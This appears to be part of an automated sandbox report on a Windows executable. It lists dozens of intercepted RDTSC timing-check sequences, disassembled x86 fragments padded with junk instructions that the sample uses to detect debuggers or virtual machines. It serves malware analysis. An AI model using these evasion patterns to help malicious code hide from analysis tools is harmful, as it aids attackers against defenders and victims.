Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D57BB9 second address: D57BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7620BAC876h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D5C2D2 second address: D5C2DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F7620C9DE46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D5C2DC second address: D5C2E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D643F8 second address: D64402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7620C9DE46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D62C6E second address: D62C8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC884h 0x00000007 jbe 00007F7620BAC876h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D62C8C second address: D62C9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F7620C9DE46h 0x0000000a jo 00007F7620C9DE46h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D62C9C second address: D62CD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC885h 0x00000007 jp 00007F7620BAC876h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007F7620BAC888h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D63286 second address: D632A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F7620C9DE56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D63420 second address: D6344D instructions: 0x00000000 rdtsc 0x00000002 js 00007F7620BAC876h 0x00000008 jmp 00007F7620BAC885h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007F7620BAC87Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D13722 second address: D13727 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D64139 second address: D64152 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC885h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D66EA2 second address: D66EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7620C9DE46h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D671D8 second address: D671E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7620BAC876h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D671E5 second address: D671EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D671EB second address: D67221 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC886h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7620BAC889h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D6BFFB second address: D6C044 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7620C9DE4Ch 0x00000008 jp 00007F7620C9DE46h 0x0000000e jmp 00007F7620C9DE52h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jnl 00007F7620C9DE79h 0x0000001b jmp 00007F7620C9DE59h 0x00000020 push eax 0x00000021 push edx 0x00000022 jnc 00007F7620C9DE46h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D73BC9 second address: D73BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D73BCF second address: D73BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D73BD3 second address: D73BE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D73BE3 second address: D73BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F7620C9DE51h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D741B8 second address: D741D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7620BAC889h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D741D9 second address: D741F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE53h 0x00000007 jo 00007F7620C9DE46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D7452D second address: D7455D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7620BAC880h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7620BAC885h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D74AF4 second address: D74B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jns 00007F7620C9DE46h 0x0000000c popad 0x0000000d pushad 0x0000000e jc 00007F7620C9DE4Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D74B0A second address: D74B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007F7620BAC876h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D75358 second address: D75367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620C9DE4Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D797B0 second address: D797BC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7620BAC876h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D797BC second address: D797C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D797C1 second address: D797C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D797C7 second address: D797CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D78BF8 second address: D78C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7620BAC876h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F7620BAC876h 0x00000015 jmp 00007F7620BAC882h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CCD537 second address: CCD547 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7620C9DE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CCD547 second address: CCD54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CCD54B second address: CCD581 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7620C9DE46h 0x00000008 jmp 00007F7620C9DE4Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007F7620C9DE59h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D78D8F second address: D78D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D78D9A second address: D78D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D78F1A second address: D78F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D78F1E second address: D78F38 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7620C9DE54h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D790A4 second address: D790AE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7620BAC876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D79374 second address: D79378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D79378 second address: D79388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F7620BAC876h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D79388 second address: D793A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE54h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D793A0 second address: D793D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F7620BAC890h 0x0000000c jmp 00007F7620BAC884h 0x00000011 jnc 00007F7620BAC876h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F7620BAC880h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D793D8 second address: D793F8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 jmp 00007F7620C9DE52h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D793F8 second address: D793FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D8548E second address: D854A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620C9DE54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D85A4E second address: D85A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D85A52 second address: D85A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620C9DE4Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F7620C9DE54h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D86180 second address: D8619A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F7620BAC882h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D8619A second address: D861A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D861A0 second address: D861A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D8B561 second address: D8B576 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE51h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D8E187 second address: D8E18C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D8E45A second address: D8E490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jmp 00007F7620C9DE52h 0x0000000b jmp 00007F7620C9DE53h 0x00000010 pop ebx 0x00000011 pushad 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D8E490 second address: D8E4AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a jmp 00007F7620BAC882h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: DB3D70 second address: DB3D89 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7620C9DE46h 0x00000008 jmp 00007F7620C9DE4Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: DB3D89 second address: DB3DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7620BAC876h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F7620BAC876h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: DB3DA1 second address: DB3DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: DB3DA5 second address: DB3DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620BAC87Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: DB3DB6 second address: DB3DCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F7620C9DE46h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 jno 00007F7620C9DE46h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: DB493A second address: DB494E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620BAC87Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: DB828C second address: DB82A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F7620C9DE4Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: DB82A0 second address: DB82AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: DB82AE second address: DB82D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007F7620C9DE48h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F7620C9DE51h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: DFBEF2 second address: DFBEF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: DFBEF7 second address: DFBF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7620C9DE46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: DFE707 second address: DFE70D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: E0D8C3 second address: E0D8C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: E0D8C7 second address: E0D8CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDA8F1 second address: EDA928 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F7620C9DE46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop eax 0x00000010 jmp 00007F7620C9DE4Bh 0x00000015 jmp 00007F7620C9DE55h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDA928 second address: EDA945 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007F7620BAC876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F7620BAC881h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDAA9E second address: EDAAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDAAA4 second address: EDAAA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDAAA8 second address: EDAAAE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDB019 second address: EDB041 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7620BAC878h 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F7620BAC887h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDB041 second address: EDB071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620C9DE58h 0x00000009 pop esi 0x0000000a push esi 0x0000000b jmp 00007F7620C9DE4Bh 0x00000010 jng 00007F7620C9DE46h 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDB071 second address: EDB088 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7620BAC882h 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDB33D second address: EDB36C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F7620C9DE57h 0x00000008 pop esi 0x00000009 jng 00007F7620C9DE48h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jng 00007F7620C9DE7Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDB36C second address: EDB370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDB370 second address: EDB393 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE56h 0x00000007 jg 00007F7620C9DE46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDCCDE second address: EDCCEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7620BAC876h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDCCEA second address: EDCCF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDCCF2 second address: EDCCF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDF61E second address: EDF622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDF622 second address: EDF628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDF900 second address: EDF941 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7620C9DE4Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F7620C9DE51h 0x00000012 push 00000004h 0x00000014 ja 00007F7620C9DE4Ch 0x0000001a push 2A42AE7Fh 0x0000001f push eax 0x00000020 push edx 0x00000021 js 00007F7620C9DE48h 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDFC66 second address: EDFC6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDFC6D second address: EDFCA6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7620C9DE48h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F7620C9DE52h 0x00000016 jmp 00007F7620C9DE53h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F00BD second address: 71F00F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 0D4856EDh 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 mov dh, al 0x00000012 mov ah, bl 0x00000014 popad 0x00000015 mov eax, 08775315h 0x0000001a popad 0x0000001b mov ebx, dword ptr [eax+10h] 0x0000001e jmp 00007F7620BAC880h 0x00000023 xchg eax, esi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F00F2 second address: 71F00F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F00F8 second address: 71F00FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
